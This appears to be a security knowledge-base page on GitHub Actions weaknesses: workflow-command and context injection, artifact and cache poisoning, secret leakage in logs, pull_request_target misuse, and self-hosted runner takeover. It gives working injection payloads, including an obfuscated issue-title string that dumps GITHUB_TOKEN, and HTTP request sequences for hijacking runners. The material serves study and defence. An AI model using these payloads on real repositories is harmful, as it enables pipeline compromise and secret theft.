GitHub Actions

Allowed unsecure commands

There are deprecated set-env and add-path workflow commands that can be explicitly enabled by setting the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable to true.

  • set-env sets environment variables via the following workflow command ::set-env name=<NAME>::<VALUE>

  • add-path updates the PATH environment variable via the following workflow command ::add-path::<VALUE>

Depending on the use of the environment variable, this could allow an attacker, in the worst case, to change the path and run a command other than the intended one, leading to arbitrary command execution. For example, consider the following workflow:

name: Vulnerable workflow


  # 1. Enable unsecure commands

    runs-on: ubuntu-latest
      # 2. Print github context
      - run: |
          print("""${{ toJSON(github) }}""")
        shell: python
      - name: Create new PR deployment
        uses: actions/github-script@v5
          # 3. Create deployment
          script: |
            return await{
                ref: context.payload.pull_request.head.sha,
                auto_merge: false,
                required_contexts: [],
                environment: "${{ env.ENVIRONMENT_NAME }}",
                transient_environment: false,
                production_environment: false,
          github-token: ${{ secrets.GITHUB_TOKEN }}

The above workflow enables unsecure commands by setting ACTIONS_ALLOW_UNSECURE_COMMANDS to true in the env section. As can be seen, the first step of the deploy job prints the github context to the workflow log. Since part of the variables in the github context is user-controlled, it is possible to abuse unsecure commands to set arbitrary environment variables. For instance, an attacker could use the pull request description to deliver the following payload, which will reset the ENVIRONMENT_NAME when the github context is printed:

\n::set-env name=ENVIRONMENT_NAME::", <YOUR_JS_CODE>//\n

GitHub Runner will process this line as a workflow command and save a malicious payload to ENVIRONMENT_NAME. As a result, injecting the ENVIRONMENT_NAME variable within the actions/github-script step will lead to code injection.


Artifact poisoning

There are many different cases where workflows use artifacts created by other workflows, for example, to get test results, a compiled binary, metrics, changes made, a pull request number, etc. This opens up another source for payload delivery. As a result, if an attacker can control the content of the downloaded artifacts and that content is not properly validated, it may lead to the execution of arbitrary commands. For example, consider the following workflows:

# .github/workflows/pr.yml
name: Pull request


      - name: Checkout
        uses: actions/checkout@v3
      # 1. Build a binary
      - name: Build
        run: make
      # 2. Upload the binary to the artifacts
      - name: Upload the compiled binary
        uses: actions/upload-artifact@v3
          name: my_bin
          path: ./my_bin
# .github/workflows/run.yml
name: Run


      # 1. Download a binary from the artefacts of the pr.yml workflow
      - name: Download binary
        uses: dawidd6/action-download-artifact@v2
          workflow: pr.yml
          name: my_bin
      # 2. Run the binary
      - name: Run
        run: ./my_bin

As can be seen, the first workflow uses the pull_request event to build a binary from an incoming pull request and upload the compiled binary to the artifacts. Since the workflow uses pull_request it can be triggered by a third-party user from a fork. Therefore, it is possible to upload a malicious binary to the artifacts. The second workflow uses the workflow_dispatch, downloads the binary from the pr.yml workflow and runs the binary. Even though the run.yml workflow is triggered manually, an attacker could execute arbitrary commands if they poisoned the artifacts just before triggering run.yml. In this case, the attack flow can look like this:

  1. An attacker forks the repository and makes malicious changes.

  2. An opens a pull request to the base repository.

  3. The pr.yml workflow checks out the code from the pull request, builds it and uploads the malicious binary to the artifacts.

  4. A maintainer triggers the run.yml workflow.

  5. The workflow downloads the malicious binary and runs it.

Remember that the pull_request event may require approval from maintainers for pull requests from forks. By default, pull_request requires approval only for first-time contributors.


How to detect downloading artifacts?

There are several ways to download artifacts from another workflow. The most common ones can be found below:

  1. Using the method within the actions/github-script action:

    - uses: actions/github-script@v6
        script: |
          let allArtifacts = await{
              owner: context.repo.owner,
              repo: context.repo.repo,
          let matchArtifact = => {
              return == "<ARTEFACT_NAME>"
          let download = await{
              owner: context.repo.owner,
              repo: context.repo.repo,
              archive_format: 'zip',
  2. Using third-party actions, such as dawidd6/action-download-artifact:

    - uses: dawidd6/action-download-artifact@v2
        name: artifact_name
        workflow: wf.yml
  3. Using the gh run download GitHub CLI command:

    - run: |
        gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
  4. Using the gh api GitHub CLI command with github.event.workflow_run.artifacts_url:

    run: |
      artifacts_url=${{ github.event.workflow_run.artifacts_url }}
      gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact
        IFS=$'\t' read name url <<< "$artifact"
        gh api $url > "$"
        unzip -d "$name" "$"

Cache poisoning

Any cache in Github Actions shares the same scope as the base branch. Therefore, if the cached content can be altered within the scope of the base branch, it is possible to poison the cache for all branches of the repository.

As a result, whatever is cached from an incoming pull request will be available in all workflows. You can reproduce this behaviour using the steps below.


  1. Create a workflow in a base repository with the next content:

    name: PR Workflow
    on: pull_request_target
        runs-on: ubuntu-latest
          - uses: actions/checkout@v3
              ref: ${{ github.event.pull_request.head.ref }}
          - uses: actions/cache@v2
              path: ~/poison
              key: poison_key
          - run: |
              cat poison
  2. Fork the repository and add poison file with arbitrary content.

  3. Create a pull request to the base repository and wait for the workflow to complete.


  1. Create a new branch in the base repository and change any file.

  2. Create a pull request to the base branch.

  3. The workflow will retrieve the poison file from the step 2 of the Poisoning section above.

Cache and deployment environments

GitHub Actions does not separate different deployment environments during caching. Suppose there are environments development and production, where production can only be run with approval. In this case, only certain people can run a workflow in the production environment, while everyone else uses the development environment. However, running these environments on the same branch can lead to cache poisoning in the production environment, because there is a logical boundary only between branches. In other words, an attacker (under certain circumstances) or any developer with write permissions can poison the cache of the base branch and get arbitrary code execution in the production environments. Therefore, an attacker or a developer can at least gain access to secrets from the production environment.

GitHub Runner registration token disclosure

GitHub Actions supports self-hosted runners that users can deploy to run jobs. The deployment process includes registering a self-hosted runner on the GitHub Service. The self-hosted runner registration process is the exchange of a GitHub Runner registration token for a temporary JWT token and the subsequent generation of an RSA key that will be used by a self-hosted runner in the future to issue JWT tokens. Therefore, the GitHub Service allows self-hosted runners to be registered based on the GitHub Runner registration token and subsequently identifies the self-hosted runner by its public key.

The GitHub Runner registration token is a short-term token that has a 1 hour expiration time and it looks like this:


In the case of a GitHub Runner registration token disclosure, an attacker can register a malicious runner, take over jobs, and gain full access to secrets and code.

You can use the next request to check a registration token:

POST /actions/runner-registration HTTP/1.1
User-Agent: GitHubActionsRunner
Content-Type: application/json; charset=utf-8

  "url": "<NAMESPACE>/<PROJECT>",
  "runner_event": "register"

For further exploitation follow the "Adding self-hosted runners" guide to add a malicious runner.

Disclosure of sensitive data

GitHub Actions write all details about a run to workflow logs, which include all running commands and their outputs. Logs of the public projects are available for everyone, and in sensitive data gets into the logs, everyone can access this data. The same applies to byproducts of workflow execution.


Printing sensitive output to workflow logs

The following example prints sensitive data received from the /user endpoint:

- run: |
    curl --fail -H 'Authorization: Bearer ${{ secrets.GH_TOKEN }}' || exit 1

Running commands in the verbose or debug mode

The following example leaks the Auth-Token header due to the curl verbose -v key:

- run: |
    curl -v -H "Auth-Token: $AUTH_TOKEN"

Misuse of sensitive data in workflows

New sensitive data may appear during the execution of workflows, for example, received from a third-party service or vault. GitHub Actions provides the add-mask workflow command to mask such data in the workflow logs. If the add-mask is not used or workflow commands have been stopped sensitive data can leak into the workflow logs.

The following example does not mark TOKEN as sensitive using add-mask and curl will expose the TOKEN to the logs:

- run: |
    curl -i -H "PRIVATE-TOKEN: $TOKEN"

Remember that if you can control the variables that are printed in the workflow logs and there is a step that uses add-mask to mask new sensitive data, you can disable add-mask by injecting the stop-commands command into the workflow log.

In the snippet below, an attacker could use the pull request description to deliver a payload and stop workflow command processing, which will cause the token to be exposed despite the add-mask being used.

- run: |
    print("""${{ toJSON(github) }}""")
  shell: python
- run: |
    echo "::add-mask::${TOKEN}"
    curl -i -H "PRIVATE-TOKEN: $TOKEN"

The payload may look like this:


Misuse of secrets in reusable workflows

When a job is used to call a reusable workflow, jobs.<job_id>.secrets can be used to provide a map of secrets that are passed to the called workflow. Under certain circumstances, the misuse of secrets can lead to the disclosure of sensitive data.

Consider the following workflows:

# dispatch.yml

name: Dispatch


    uses: ./.github/workflows/reusable.yml
      creds: |
        AWS_ACCESS_KEY_ID=${{ secrets.AWS_ACCESS_KEY_ID }}
# reusable.yml

name: Reusable

        description: Arguments

    runs-on: ubuntu-latest
      - name: Parse creds
        run: |
          import os
          creds = os.environ['CREDS']
          creds = creds.split('\n')
          print(f'ID: {creds[0].split("=")[-1]}')
          print(f'KEY: {creds[1].split("=")[-1]}')
          CREDS: ${{ secrets.creds }}
        shell: python

The dispatch.yml workflow invokes the reusable.yml reusable workflow and passes AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY using the creds secrets. The reusable.yml workflow parses the creds secrets and extracts the AWS_SECRET_ACCESS_KEY and AWS_SECRET_ACCESS_KEY. Even though ${{ secrets.creds }} is masked in the logs, and AWS_SECRET_ACCESS_KEY and AWS_SECRET_ACCESS_KEY are stored in encrypted secrets, reusable.yml will reveal the ID and key in plain text.

It happens because by default reusable workflows do not have access to the encrypted secrets and secrets must be defined via the jobs.<job_id>.secrets. As a result, if some sensitive data is extracted from the passed secrets, as in the example above, it can lead to their leakage into the workflow log.

Below you can find one of the in-wild examples where the docker/build-push-action parses the npm credentials from the build_args and leaks them into the logs:

name: build

      - main

    uses: ./.github/workflows/build-docker.yaml
      build_args: |
        NPM_EMAIL=${{ secrets.NPM_EMAIL }}
        NPM_AUTH=${{ secrets.NPM_AUTH }}
# build-docker.yaml
name: build-docker

        required: false

    runs-on: ubuntu-latest
      # ...
      - uses: docker/build-push-action@v3
          build-args: ${{ secrets.build_args }}
          # ...

Misuse of secrets in manual workflows

If the workflow_dispacth workflow receives secrets in the inputs context and does not mask them, with a high degree of probability the secrets will leak into the workflow log.

For example, the following workflow gets a token from the inputs context and reveals that token in the workflow log, passing the token to environment variables:

name: Release

        description: 'API Token'
        required: true

    runs-on: ubuntu-latest
      - run: ./
          API_TOKEN: ${{ inputs.token }}

Output parameters and debug mode

All output parameters not marked as sensitive will be logged if the debug mode is enabled.

The following example will leak the tokens into the workflow logs if the debug mode is enabled:

- run: |
    # set output using deprecated set-output command
    echo "::set-output name=token::$(./get_token)"
    # set output using $GITHUB_OUTPUT file
    echo "token=$(./get_token)" >> $GITHUB_OUTPUT

The workflow log discloses the token in plaintext:

::set-output name=token::cG1jTXaVaAT2K1Qur6G2dryZ6WfuCZcuGck3VU
Warning: The `set-output` command is deprecated and will be disabled soon. Please upgrade to using Environment Files. For more information see:
##[debug]Set output token = uFlZdXxx5d2jXbTitxpq1FY8WsZTWtadcuFlZd

Workflow artifacts

Artifacts in the public repositories are available to everyone for a retention period (90 days by default). Therefore, if sensitive data is leaked into artifacts, an attacker can download them and the sensitive data inside.

Workflow cache

Unlike artifacts, the cache is only available while a workflow is running. However, anyone with read access can create a pull request on a repository and access the contents of the cache. Forks can also create pull requests on the base branch and access caches on the base branch.

Contexts misusing

GitHub Actions workflows can be triggered by a variety of events. Every workflow trigger is provided with contexts. One of the contexts is the GitHub context that contains information about the workflow run and the event that triggered the run.

The list below contains user-controlled GitHub context variables for various events.

# pull_request_target
# issues
# issue_comment
# discussion
# discussion_comment
# workflow_run

GitHub Actions support their own expression syntax that allows access to the context values.

- name: Check title
  run: |
    title="${{ github.event.issue.title }}"
    if [[ ! $title =~ ^.*:\ .*$ ]]; then
      echo "Bad issue title"
      exit 1

The run: block in the example above creates a bash script based on the content inside the block to execute the script during the Check title step execution. The content of the run: block is interpreted as a template and expressions inside ${{ }} are evaluated and replaced with the resulting values before the bash script is run. Therefore, if an attacker can control a context variable that is used inside ${{ }}, they will be able to inject arbitrary commands into the bash script. In the case above, an attacker can use the payloads like a"; echo test or `echo test` to execute malicious commands.

Another context that can contain user-controlled data is the env context. The env context contains environment variables that have been set in a workflow, job, or step. Using variable interpolation ${{ }} with the env context data in a run: could allow an attacker to inject malicious commands. In the snippet below, an attacker can create an issue with a payload in the issue title.


  TITLE: "${{ github.event.issue.title }}"

    runs-on: ubuntu-latest
      - name: Check title
        run: |
          title="${{ env.TITLE }}"
          if [[ ! $title =~ ^.*:\ .*$ ]]; then
            echo "Bad issue title"
            exit 1

Additionally, it is possible to control values of the outputs property that is provided by steps and needs contexts:

The outputs property contains the result/output of a specific job or step. outputs may accept user-controlled data which can be passed to the run: block. In the following example, an attacker can execute arbitrary commands by creating a pull request named `;arbitrary_command_here();// because steps.fetch-branch-names.outputs.prs-string contains a pull request title:

    runs-on: ubuntu-latest
      # action uses PR's title to craft prs-string output
      - uses: actions/github-script@v6
        id: fetch-branch-names
        name: Fetch branch names
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
            const pulls = await github.paginate('GET /repos/:owner/:repo/pulls', {
              owner: context.repo.owner,
              repo: context.repo.repo
            branches = [];
            prs = [];
            base_branch = null;
            for (const pull of pulls) {
                // ...
                if (statusOK) {
                  console.log('Adding branch to array: ' + branch);
                  prs.push('Closes #' + pull['number'] + ' ' + pull['title']);
                  base_branch = pull['base']['ref'];
            // ...
            core.setOutput('prs-string', prs.join('\n'));
            // ...
      # action uses crafted prs-string within the ${{ }} expression
      - uses: actions/github-script@v6
        name: Create Combined Pull Request
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
            const prString = `${{ steps.fetch-branch-names.outputs.prs-string }}`;
            // ...

The same applies to data that is sent to the pre and post actions.


Potentially dangerous third-party actions

Remember that injecting user-controlled data into variables of third-party actions can lead to vulnerabilities such as commands or code injection. Below you can find a list of the most common actions which, if misused, can lead to vulnerabilities.

Github action
Potential vulnerability

Write workflows scripting the GitHub API in JavaScript

Using variable interpolation ${{ }} with script: can lead to JavaScript code injection

A GitHub Action to send queries to GitHub's GraphQL API

Using variable interpolation ${{ }} with query: can lead to injection to a GraphQL request

A GitHub Action to send arbitrary requests to GitHub's REST API

Using variable interpolation ${{ }} with route: can lead to injection to a request to REST API

Misconfiguration of OpenID Connect

With OpenID Connect, a GitHub Actions workflow requires a token to access resources in a cloud provider. The workflow requests an access token from a cloud provider, which checks the details presented by the JWT. If the trust configuration in the JWT is a match, a cloud provider responds by issuing a temporary token to the workflow, which can then be used to access resources in a cloud provider.

When developers configure a cloud to trust GitHub's OIDC provider, they must add conditions that filter incoming requests, so that untrusted repositories or workflows can't request access tokens for cloud resources. Audience and Subject claims are typically used in combination while setting conditions on the cloud role/resources to scope its access to the GitHub workflows.

  • Audience: By default, this value uses the URL of the organization or repository owner. This can be used to set a condition that only the workflows in the specific organization can access the cloud role.

  • Subject: Has a predefined format and is a concatenation of some of the key metadata about the workflow, such as the GitHub organization, repository, branch or associated job environment. There are also many additional claims supported in the OIDC token that can also be used for setting these conditions.

However, if a cloud provider is misconfigured, untrusted repositories can request access tokens for cloud resources.


GitHub workflows can be triggered by events related to incoming pull requests. The table below contains all the events that can be used to handle incoming pull requests:



Possible GITHUB_TOKEN permissions

Access to secrets

PR merge branch



PR merge branch



PR base branch



Default branch



Default branch



  • pull_request and pull_request_target triggered a workflow when activity on a pull request in the workflow's repository occurs. The main differences between the two events are:

    1. Workflows triggered via pull_request_target have write permissions to the target repository and have access to target repository secrets. The same is true for workflows triggered on pull_request from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user has write permissions to the target repository already.

    2. pull_request_target runs in the context of the target repository of the pull request, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of a user-supplied code.

  • issue_comment runs a workflow when a pull request comment is created, edited, or deleted.

  • workflow_run runs a workflow when a workflow run is requested or completed. It allows the execution of a workflow based on the execution or completion of another workflow.

Normally, using pull_request_target, issue_comment or workflow_run is safe because actions only run code from a target repository, not an incoming pull request. However, if a workflow uses these events with an explicit checkout of a pull request, it can lead to untrusted commands or code execution.


    name: Build and test
    runs-on: ubuntu-latest
        # 1. Check out the content from an incoming pull request
        - uses: actions/checkout@v3
            ref: ${{ github.event.pull_request.head.sha }}
        - uses: actions/setup-node@v1
        # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as
        #    the build scripts and referenced packages are controlled by the author of the pull request
        - run: |
            npm install
            npm build

There are several ways to check out a code from a pull request:

  • Using the actions/checkout action to checkout changes from a head repository.

    - uses: actions/checkout@v3
        ref: refs/pull/${{ github.event.pull_request.number }}/merge
  • Explicitly checking out using git in the run: block.

    run: |
      git fetch origin $HEAD_BRANCH
      git checkout origin/master
      git config "release-hash-check"
      git config "<>"
      git merge --no-commit --no-edit origin/$HEAD_BRANCH
      HEAD_BRANCH: ${{ github.head_ref }}
  • Use GitHub API or third-party actions:

    - uses: octokit/request-action@v2.1.4
        route: GET /repos/{owner}/{repo}/pulls/{number}
        owner: namespace
        repo: reponame
        number: ${{ github.event.issue.number }}
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

The following context variables may help to find cases where an incoming pull request is checked out:

# id is a commit sha
# environment variable


Confusion between head.ref and head.sha

Sometimes developers implement workflows in such a way that they require manual review before execution. It is guaranteed that untrusted content will be reviewed by a maintainer before execution. Consider the following workflow:

name: Handle pull requests

      - labeled

    name: Build and test
    runs-on: ubuntu-latest
    if: ${{ == 'approved' }}
      - uses: actions/checkout@v3
          ref: ${{ github.event.pull_request.head.ref }}
      - uses: actions/setup-node@v1
      - name: Build
        run: |
          npm install
          npm build

As can be seen, the workflow is triggered when the approved label is set on a pull request. In other words, only a maintainer with write permissions can manually trigger this workflow. However, the workflow is still vulnerable, because it uses github.event.pull_request.head.ref to check out the repository content. Consider the difference between head.ref and head.sha. head.ref points to a branch while head.sha points to a commit. This means that if head.sha is used to check out a repository, the content will be fetched from the commit that was used to trigger the workflow. In the case of labeling a pull request, it will be the HEAD commit that was reviewed by a maintainer before the label was set. However, if head.ref is used, a repository is checked out from the base branch. As a result, an attacker can inject a malicious payload right after the manual approval (TOCTOU attack). The attack flow may look like this:

  1. An attacker forks a target repository.

  2. An attacker makes valid changes and opens a pull request.

  3. An attacker waits for the label to be set.

  4. A maintainer sets the approved label that triggers the vulnerable workflow.

  5. An attacker pushes a malicious payload to the fork.

  6. The workflow checks out the malicious payload and executes them.

Misuse of the pull_request_target event in non-default branches

The pull_request_target event can be used to trigger workflows in non-default branches if there is no restriction based on branches and branches-ignore filters.

# ...

GitHub uses the workflow from a non-default branch when creating a pull request to that branch. Therefore, if there is a vulnerable workflow in a non-default branch that can be triggered by the pull_request_target event, an attacker can open a pull request to that branch and exploit a vulnerability.

This is a common pitfall when fixing vulnerabilities, developers can only fix a vulnerability in the default branch and leave the vulnerable version in non-default branches.

Misuse of the workflow_run event

workflow_run was introduced to enable scenarios that require building the untrusted code and also need write permissions to update a pull request with e.g. code coverage results or other test results. To do this in a secure manner, the untrusted code is handled via the pull_request trigger so that it is isolated in an unprivileged environment. The workflow processing a pull request stores any results like code coverage or failed/passed tests in artifacts and exits. The following workflow then starts on workflow_run where it is granted write permission to the target repository and access to repository secrets so that it can download the artifacts and make any necessary modifications to the repository or interact with third-party services that require repository secrets (e.g. API tokens).

Nevertheless, there are still ways of transferring data controlled by a user from untrusted pull requests to a privileged workflow_run workflow context:

  1. The github.event.workflow_run context. Please, check out Contexts misusing and Misuse of the events related to incoming pull requests for more details.

  2. Artifacts. Please, check out Artifact poisoning for more details.

Even if a workflow_run workflow does not properly use context variables or artifacts, it may still be unexploitable because the pull_request event requires approval from maintainers for pull requests from forks. By default, pull_request workflows require approval only for first-time contributors. So, if a repository does not require approval for all outside collaborators (default behaviour), you can make changes to the target repository to become a contributor. After that, you will be able to fully control a pull_request workflow for exploitation.


Misuse of self-hosted runners

Self-hosted runners can be launched as an ephemeral using the --ephemeral option. ephemeral option configures a self-hosted runner to only take one job and then let the service un-configure the runner after the job finishes. This is implemented by sending the ephemeral value within a request during runner registration:

POST /l8zOmabebUmdmqSaVGVjnhvkK9o6XCANRwPqdM3hfsO92dqZdj/_apis/distributedtask/pools/1/agents HTTP/2
User-Agent: VSServices/
Authorization: Bearer <TOKEN>
Content-Type: application/json; charset=utf-8; api-version=6.0-preview.2

  "labels": [
  "maxParallelism": 1,
  "createdOn": "0001-01-01T00:00:00",
  "authorization": {
  "id": 0,
  "name": "Dummy-Runner",
  "version": "2.290.1",
  "osDescription": "Darwin 21.4.0",
  "ephemeral": true,
  "disableUpdate": false,
  "status": 0,
  "provisioningState": "Provisioned"

As a result, an ephemeral runner has the following lifecycle:

  1. The runner is registered with the GitHub Actions service.

  2. The runner takes one job and performs it.

  3. When the runner completes the job, it cleans up the local environment (.runner, .credentials, .credentials_rsaparams files).

  4. The GitHub Actions service automatically de-registers the runner.

Therefore, if an attacker gains access to an ephemeral self-hosted runner, they will not be able to affect other jobs.

However, self-hosted runners are not launched as ephemeral by default and there is no guarantee around running in an ephemeral clean virtual environment. So, runners can be persistently compromised by untrusted code in a workflow. An attacker can abuse a workflow to access the following files that are stored in a root folder of a runner host:

  • .runner that contains general info about a runner, such as an id, name, pool id, etc.

  • .credentials that contains authentication details such as the scheme used and authorization URL.

  • .credentials_rsaparams that contains the RSA parameters that were generated during the registration and are used to sign JWT tokens.

These files can be used to takeover a self-hosted runner with the next steps:

  1. Fetch .runner, .credentials, .credentials_rsaparams files with all the necessary data written during the runner registration.

  2. Get an access token using the following request:

    POST /_apis/oauth2/token/<UUID> HTTP/2
    User-Agent: GitHubActionsRunner
    Content-Type: application/x-www-form-urlencoded


    • UUID can be found in the .credentials file.

    • BEARER_TOKEN is generated using the parameters from .credentials and .credentials_rsaparams files.

  3. Remove a current session:

    DELETE /<RANDOM_PREFIX>/_apis/distributedtask/pools/1/sessions/<SESSION_ID> HTTP/2
    User-Agent: VSServices/
    Authorization: Bearer <BEARER_TOKEN>


    • RANDOM_PREFIX can be found in the .runner file.

    • SESSION_ID is a session ID that can be found in the _diag/Runner_<DATE>-utc.log file with the runner logs.

    • BEARER_TOKEN is a bearer token from the response in the previous step.

  4. Copy the .runner, .credentials, .credentials_rsaparams files to a root folder of a malicious runner.

  5. Run a malicious runner.

The takeover has the greatest impact when a self-hosted runner is defined at the organization or enterprise level because GitHub can schedule workflows from multiple repositories onto the same runner. It allows an attacker to gain access to the jobs which will use the malicious runner.


Using the pull_request event with self-hosted runners

GitHub does not provide a mechanism to prevent the pull_request event from being triggered from forks. The only thing available is to require approval for all outside collaborators. However, if approval is only required for the first contribution, you can make some valid changes and then add a malicious workflow that uses pull_request for running on a self-hosted runner.


Detection of the use of self-hosted runners

You can find using of self-hosted runners by the following runs-on labels (remember about a build matrix as well):

  • self-hosted default label applied to all self-hosted runners.

  • linux, windows, or macOS applied depending on an operating system.

  • x64, ARM, or ARM64 applied depending on hardware architecture.

  • Custom labels, which are manually assigned to self-hosted runners (there is a list with GitHub-hosted runner labels which can't be custom ones).

Using vulnerable actions

An action is a custom application for the GitHub Actions platform that performs a complex but frequently repeated task. Like any code actions can be vulnerable - it can be a vulnerability in the code of an action or a used package or dependency. Since individual jobs in a workflow can interact with other jobs, if one of the jobs uses a vulnerable action, it can compromise the entire workflow. For example, a job querying the environment variables used by a later job, writing files to a shared directory that latter job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them.

There are three types of actions:

Composite action

Composite action is used to execute the defined steps that can run shell code or use other actions. Since a composite action can run scripts written in different languages (bash, python, go, etc.), they can also be vulnerable to common weaknesses like code and command injection, path traversal, etc.

Command injection

Composite actions allow defining inputs that can be used during execution:

# fake-actions/composite-action
name: 'Hello World'
description: 'Greet someone'

    description: 'Who to greet'
    required: true

  using: "composite"
    - run: echo Hello ${{ inputs.who-to-greet }}.
      shell: bash

Handling inputs is performed using variable interpolation ${{ ... }}. Therefore, if the inputs are embedded directly into the run: block, an attacker can inject arbitrary commands:

on: workflow_dispatch

    runs-on: ubuntu-latest
    name: A job to say hello
      - uses: actions/checkout@v2
      - uses: fake-actions/composite-action@v1
          # this input will be injected to the run: block in fake-actions/composite-action
          # it will look in the following way:
          # runs:
          #   using: "composite"
          #   steps:
          #     - run: echo Hello World!; echo hop.
          #       shell: bash
          who-to-greet: 'World!; echo hop'

As a result, it is possible at least extract secrets from environment variables and generated shell scripts. For instance, in the snippet below an attacker can open an issue with title ";{cat,/home/runner/work/_temp/$({xxd,-r,-p}<<<2a)}|{base64,-w0};# to dump GITHUB_TOKEN:

# Vulnerable third-party action:
# fake-actions/update-issues
    description: 'Issue number'
    required: true
    description: 'Issue title'
    required: true
    description: 'GitHub API token'
    required: false
    default: ${{ github.token }}

  using: composite
  - name: Run
    shell: bash
    # inject inputs directly to the run: block
    # we can use the injection to dump the generated shell script
    # and access the github_token
    run: |
      pip3 install -r requirements.txt
      ./ --token "${{ inputs.github_token }}" \
        --issue-number "${{ inputs.issue_number }}" \
        --issue-title "${{ inputs.issue_title }}"
# Workflow that uses fake-actions/update-issues
    types: [open, edited]

    runs-on: ubuntu-latest
    name: Check issue title
      - uses: actions/checkout@v2
      - uses: fake-actions/update-issues@v1
          issue_number: ${{ github.event.issue.number }}
          # uses issue title as input
          # issue title is controlled by a user
          issue_title: ${{ github.event.issue.title }}

The same applies to contexts that can be used for command injection, check out Contexts misusing.

Disclosure of sensitive data

New sensitive data may appear during the execution of composite actions, such as temporary tokens, retrieved data, etc. GitHub Actions allow developers to mask this data in logs using add-mask workflow command. So, if the add-mask is not used or workflow commands have been stopped sensitive data can leak to the run logs:

name: 'API requester'
description: 'Send requests to API with curl'
    description: 'Token'
    required: true

  using: "composite"
    - run: |
        BASIC_AUTH=$(echo -n "token:${{ inputs.TOKEN }}" | base64)
        curl -v -H "Authorization: Basic $BASIC_AUTH"
      shell: bash

JavaScript action

JavaScript action is used to execute a Node.js code. Since a JavaScript action is a Node.js application, it can be vulnerable to common Node.js weaknesses such as code and command injection, prototype pollution, etc.

Command injection

GitHub Actions toolkit provides the @actions/exec package to execute shell commands:

const exec = require('@actions/exec');
await exec.exec('node index.js');

github-script provides the exec object to access the exec package:

- uses: actions/github-script@v6
    script: |
      await exec.exec('node index.js');

If user-controlled data (inputs, GitHub context, etc.) is passed directly to the exec it can lead to command or argument injection.

Disclosure of sensitive data

New sensitive data may appear during the JavaScript action execution, such as temporary tokens, retrieved data, etc. For such sensitive data to be masked in the logs, the @actions/core provides the core.setSecret method. code.setSecret registers the data in the runner to ensure it is masked in the logs. Therefore, if the code.setSecret is not used sensitive data can leak to workflow run logs.

For instance, the sample below will leak api_token to logs if the debug mode is enabled:

const core = require("@actions/core");
let api_token = client.get_token();
// the token will not be masked in the logs
core.setOutput("api_token", token);

The workflow log discloses the token in plaintext:

// workflow run log
##[debug]Set output api_token = cG1jTXaVaAT2K1Qur6G2dryZ6WfuCZcuGck3VU

Github context

JavaScript actions can access the GitHub context via @actions/github:

const github = require("@actions/github");
const context = github.context;

github-script provides the context object to access the GitHub context:

- uses: actions/github-script@v6
    script: |

The next variables in the GitHub context are controlled by a user:

  • context.payload.pull_request.title

  • context.payload.pull_request.body

  • context.payload.pull_request.head.ref

  • context.payload.pull_request.head.label

  • context.payload.pull_request.head.repo.default_branch

  • context.payload.pull_request.head.repo.description

  • context.payload.pull_request.head.repo.homepage

  • context.payload.issue.body

  • context.payload.issue.title

  • context.payload.comment.body

  • context.payload.discussion.body

  • context.payload.discussion.title

These variables can be used as a source to pass arbitrary data to vulnerable code.

Octokit GraphQL API injection

@actions/github allows making GraphQL requests (check for the API):

const github = require('@actions/github');
const octokit = github.getOctokit(myToken);
const result = await octokit.graphql(query, variables);

github-script provides the github object to access the octokit client:

- uses: actions/github-script@v6
    script: |
      const result = await github.graphql(query, variables);

If user-controlled data (inputs, GitHub context, etc.) is passed directly to the query it can lead to an injection into GraphQL request.

Octokit REST API injection

@actions/github allows making requests to REST API (check for the API):

const github = require('@actions/github');
const octokit = github.getOctokit(myToken);
const { data: pullRequest } = await{
  owner: 'octokit',
  repo: 'rest.js',
  pull_number: 123,
  mediaType: {
    format: 'diff'

github-script provides the github object to access the octokit client:

- uses: actions/github-script@v6
    script: |
      const { data: pullRequest } = await{
        owner: 'octokit',
        repo: 'rest.js',
        pull_number: 123,
        mediaType: {
          format: 'diff'

If user-controlled data (inputs, GitHub context, etc.) is passed directly to the next methods it can lead to injection into requests to REST API:

Docker action

Docker container action is used to run a Docker container and execute a code in Docker. Since a Docker container action runs scripts written in different languages (bash, python, go, etc.), they can also be vulnerable to common weaknesses like code and command injection, path traversal, etc.

Disclosure of sensitive data

New sensitive data may appear during the execution of Docker container actions, such as temporary tokens, retrieved data, etc. GitHub Actions allow developers to mask this data in logs using add-mask workflow command. So, if the add-mask is not used or workflow commands have been stopped sensitive data can leak to the run logs:

name: 'API requester'
description: 'Send requests to API with curl'
    description: 'Token'
    required: true

  using: "docker"
  image: "Dockerfile"

BASIC_AUTH=$(echo -n "token:${TOKEN}" | base64)
curl -v -H "AUTH: ${BASIC_AUTH}"

Using a malicious docker image

In addition to a local Dockerfile in a repository, third-party Docker images from a registry can be used. Therefore, these Docker images may be vulnerable, causing the container to be compromised.


Sensitive mounts

Github runner passes part of the environment variables and mounts volumes when running a Docker container:

/usr/bin/docker run \
    --name b31b05063130cf75cab0a728bd52f90782d_ea3c3b \
    --label 294b31 \
    --workdir /github/workspace \
    --rm \
    -v "/var/run/docker.sock":"/var/run/docker.sock" -v "/home/runner/work/_temp/_github_home":"/github/home" -v "/home/runner/work/_temp/_github_workflow":"/github/workflow" -v "/home/runner/work/_temp/_runner_file_commands":"/github/file_commands" -v "/home/runner/work/actions/actions":"/github/workspace" \

Here it is worth paying attention to at least the following things:

  1. Exposed Docker socket at /var/run/docker.sock. It allows an attacker to escape from the container. Please, check out Container: Escaping - Exposed Docker Socket

  2. /github/workspace is a folder with repository content. For example, an attacker can grab a repository token from the /github/workspace/.git/config file, check out the "Exfiltrating data from a runner" section.

Unclaimed actions

Third-party actions may be available for claiming because the namespace (username or organization name) has been changed or removed. If the namespace has been changed GitHub will redirect the old namespace to the new one and thus workflows that use the actions with the old namespace will continue to execute successfully. In this case, an attacker can try to claim the old namespace by registering a user or creating an organization. If it is possible, an attacker can create a malicious action which will later be executed by workflows that use actions with the claimed namespace.


Reusing vulnerable workflows

